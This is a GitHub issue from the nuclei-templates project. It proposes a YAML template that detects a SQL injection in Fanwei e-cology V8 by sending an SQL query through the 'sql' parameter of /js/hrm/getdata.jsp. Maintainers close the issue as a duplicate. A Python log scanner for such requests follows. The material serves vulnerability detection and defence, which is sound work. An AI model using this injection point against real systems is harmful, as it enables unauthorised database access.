projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

CNVD-2021-33202 fanwei e-cology V8 SQL injection #5212

Closed loulan-ling closed 7 months ago

loulan-ling commented 2 years ago
id: CNVD-2021-33202

info:
  name: Fanwei e-cology V8 SQL Injection
  author: ling
  description: There is a SQL injection vulnerability in Fanwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
  severity: high
  reference:
    - https://www.cnblogs.com/0day-li/p/14637680.html
  classification:
    # Note: the metric names (Au, C:C) are CVSS v2 notation despite the CVSS:3.0 prefix
    cvss-metrics: CVSS:3.0AV:N/AC:L/Au:N/C:C/I:N/A:N
    cvss-score: 7.8
    cwe-id: CWE-89
  tags: fanwei,cnvd,cnvd2021,sqli

requests:
  - method: GET
    path:
      # The sql parameter carries the query "select 1234 as id"
      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id"

    # Both matchers must succeed
    matchers-condition: and
    matchers:
      # Looks for the literal value selected by the query above
      - type: regex
        regex:
          - "1234"

      - type: status
        status:
          - 200

tess-ss commented 2 years ago

Hi @loulan-ling

Thank you for taking time and contributing to Nuclei :)

Can you please share multiple references for this issue, and also the debug data so we can verify the template, please?

Thanks, @tess-ss

DhiyaneshGeek commented 7 months ago

Hi @loulan-ling, we have a template for this, http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml, so we are closing this issue.

Thanks
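
For defenders, the request sent by the template in the first comment is straightforward to look for in web server logs. The following is an added example, not part of the issue or of the nuclei-templates project: it flags access-log entries that reach `/js/hrm/getdata.jsp` with a `sql` query parameter. The combined log format, the sample lines, the function name `find_probes` and the case-insensitive path match are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format); not taken from the issue.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id HTTP/1.1" 200 12 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /JS/hrm/getdata.jsp?sql=SELECT+1&cmd=getSelectAllId HTTP/1.1" 200 9 "-" "curl/8.0"
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId HTTP/1.1" 200 2 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /index.jsp?sql=1234 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status of a combined-format entry.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
TARGET_PATH = "/js/hrm/getdata.jsp"  # endpoint requested by the template


def find_probes(log_text):
    """Return one dict per request to TARGET_PATH that carries a sql parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        # Assumption: compare the decoded path case-insensitively so that
        # case or percent-encoding variations of the path are still flagged.
        if unquote(url.path).lower() != TARGET_PATH:
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        params = {k.lower(): v for k, v in query.items()}
        if "sql" not in params:
            continue  # same endpoint, but no caller-supplied SQL text
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "cmd": params.get("cmd", [""])[0],
            "sql": params["sql"][0],  # URL-decoded value of the parameter
        })
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```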